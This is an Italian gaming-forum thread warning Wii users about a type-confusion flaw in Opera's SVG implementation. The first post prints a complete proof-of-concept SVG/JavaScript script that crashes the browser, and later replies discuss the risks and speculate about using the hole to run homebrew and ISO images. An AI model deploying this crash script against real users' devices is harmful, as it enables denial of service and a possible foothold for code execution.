Attenzione a navigare con opera su WII

[Tamiyadd]

NON CLICCATE ASSOLUTAMENTE CON IL WII NEL LINK CITATO NEL QUOTE PERCHE' VI MANDERA' IN CRASH IL WII

A flaw exists within Opera's Javascript SVG implementation. When processing a createSVGTransformFromMatrix request Opera does not properly validate the type of object passed to the function. Passing an incorrect object to this function can result in it using a pointer that is user controlled when it attempts to make the virtual function call.

Exploitation of this vulnerability would allow an attacker to execute arbitrary code on the affected host. The attacker would first need to construct a website containing the malicious JavaScript and trick the vulnerable user into visiting the site. This would trigger the vulnerability and allow the code to execute with the privileges of the local user.

This exploit could possibly be used to run code on the Wii!

If you would like to see this in action, surf to this site on your Wii browser and click HERE. This will cause your Wii to crash!!!

Code:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg id="mySVG" width="100%" height="100%" version="1.1"
xmlns="http://www.w3.org/2000/svg">

<rect width="300" height="100"
style="fill:rgb(0,0,255);stroke-width:1;
stroke:rgb(0,0,0)"/>

<script>
var svg = document.getElementById("mySVG");
var matrix = svg.createSVGMatrix();
var i=0xffffffff, randomObject = {a:i,b:i,c:i,d:i,e:i,f:i};

try{
svg.createSVGTransformFromMatrix(matrix);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(randomObject);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(null);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(i);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(new Array(i));
}catch(e){}
</script>

</svg>

in poche parole attenzione a dove navigate perch&#232; basta che nella pagina sia inserito lo script sopra citato che chiunque malintenzionato pu&#242; aprire breccia nel wii e eseguire codice!!!

fonte: http://wii.ps2-scene.org/

[nintenleo]

B&#232;,forse avresti fatto meglio a non postare lo script
Cmq io col Wii in Internet nn ci vado quasi mai...e se ci vado al massimo vado su GR o sul sito di Nintendo.

[Tamiyadd]

Bè,forse avresti fatto meglio a non postare lo script
Cmq io col Wii in Internet nn ci vado quasi mai...e se ci vado al massimo vado su GR o sul sito di Nintendo.

lo script lo si può trovare tranquillamente ovunque quindi non è nulla di vietato

[@lorenzosp@]

gulp!!!

[nintenleo]

lo script lo si può trovare tranquillamente ovunque quindi non è nulla di vietato

Ah...bè io nn ne sapevo niente

[Schaty-The World's Reason]

Si lo avevo letto gi&#224; da qualche parte, grazie per il consiglio

[andrea'85]

grazie mille!
ma cosa succede di preciso se mi entrano nel wii?(a parte potermi fregare 200 wiipoints)!

[Sunshine-128]

Come si fa ad evitare lo script?

[Jacchan]

grazie mille!
ma cosa succede di preciso se mi entrano nel wii?(a parte potermi fregare 200 wiipoints)!

Beh, visto che si può pagare sulla VC pure con la carta di credito, oltre che coi points...

[frankie85]

In Opera non si puo' disabilitare il Javascript?

[Tamiyadd]

grazie mille!
ma cosa succede di preciso se mi entrano nel wii?(a parte potermi fregare 200 wiipoints)!

purtroppo penso possano farti crashare il wii se non danneggiarlo
ma è una supposizione

La cosa migliore per evitare rischi è navigare su siti attendibili purtroppo non ci sono ancora protezioni quindi per ora usate il wii solo per siti di cui vi potete fidare e per gli altri usate il pc

[Tamiyadd]

chiederei ai moderatori, vista la seriet&#224; e la gravit&#224; della faccenda, di stickare il post in modo da rendere maggiormente visibile a tutti la notizia!!!

[nintenleo]

Dovrebbero inserirlo nel topic al TOP del Wii (quello di Megalo) se proprio nn possono stickarlo

[°-Lord of Kaos-°]

Pi&#249; che altro si pensa che grazie a questo buco si riescir&#224; in futuro a far partire homebrew e .iso... quindi se siete interessati non vi conviene fare un futuro aggiornamento della console...

[M4X]

Più che altro si pensa che grazie a questo buco si riescirà in futuro a far partire homebrew e .iso... quindi se siete interessati non vi conviene fare un futuro aggiornamento della console...

E perdere tutti i nuovi canali che inseriranno? No, grazie. Tanto a che servono le homebrew su una console casalinga?